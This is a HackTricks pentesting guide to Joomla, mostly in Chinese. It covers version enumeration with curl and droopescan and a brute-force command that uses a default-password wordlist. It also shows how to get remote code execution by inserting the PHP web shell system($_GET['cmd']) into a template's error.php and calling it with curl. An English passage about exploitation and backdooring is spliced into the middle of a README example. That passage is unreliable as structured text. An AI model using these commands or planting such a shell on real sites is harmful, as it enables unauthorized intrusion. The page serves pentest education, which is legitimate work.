hacktricks/network-services-pentesting/pentesting-web/joomla.md

Joomla

☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 您在网络安全公司工作吗？ 想要在HackTricks中看到您的公司广告？ 或者想要访问PEASS的最新版本或下载PDF格式的HackTricks？ 请查看订阅计划!
• 发现我们的独家NFTs收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入 💬 Discord群组 或 电报群组 或 关注我在Twitter 🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

Joomla统计信息

Joomla收集一些匿名的使用统计信息，例如Joomla、PHP和数据库版本的分布以及Joomla安装中使用的服务器操作系统。 可以通过他们的公共API查询这些数据。

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

枚举

发现/足迹

• 检查 meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

• robots.txt

• robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

• README.txt

Joomla

Introduction

Joomla is a popular open-source content management system (CMS) written in PHP. It is used to build websites and online applications. In this section, we will discuss how to pentest Joomla websites.

Enumeration

1. Version Detection: Use tools like wpscan or joomscan to identify the Joomla version running on the target website.

2. Directory and File Enumeration: Look for common Joomla directories like /administrator, /components, /modules, /plugins, and /templates. Also, search for configuration files like configuration.php.

Exploitation

1. Known Vulnerabilities: Exploit known vulnerabilities specific to the detected Joomla version. Search for relevant exploits on platforms like Exploit Database or GitHub.

2. Brute Force Attacks: Attempt to brute force the login page using tools like Hydra or Burp Suite Intruder.

3. SQL Injection: Look for SQL injection vulnerabilities in input fields or parameters. Use tools like SQLMap to automate the process.

Post-Exploitation

1. Privilege Escalation: If you gain access to the Joomla admin panel, escalate privileges by creating a new admin user or modifying existing user roles.

2. Backdooring: Plant a backdoor for persistent access to the Joomla website. This can be achieved by modifying existing files or creating new ones.

Conclusion

Pentesting Joomla websites requires a good understanding of the CMS and its vulnerabilities. By following the enumeration, exploitation, and post-exploitation techniques mentioned above, you can effectively assess the security of Joomla websites.

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

版本

• 在 /administrator/manifests/files/joomla.xml 中可以看到版本。
• 在 /language/en-GB/en-GB.xml 中可以获取 Joomla 的版本。
• 在 plugins/system/cache/cache.xml 中可以看到一个大致的版本。

droopescan scan joomla --url http://joomla-site.local/

Brute-Force

您可以使用此脚本尝试对登录进行暴力破解。

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

如果你成功获取了管理员凭证，你可以通过添加一小段PHP代码来在其中实现RCE。我们可以通过自定义一个模板来实现这一点。

1. 在Configuration下方点击**Templates**以打开模板菜单。
2. 点击一个模板名称。让我们选择Template列标题下的**protostar。这将带我们到Templates: Customise**页面。
3. 最后，你可以点击一个页面以查看页面源代码。让我们选择**error.php页面。我们将添加一个PHP 一行代码来执行代码**，如下所示：

   system($_GET['cmd']);
   

4. 保存并关闭
5. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id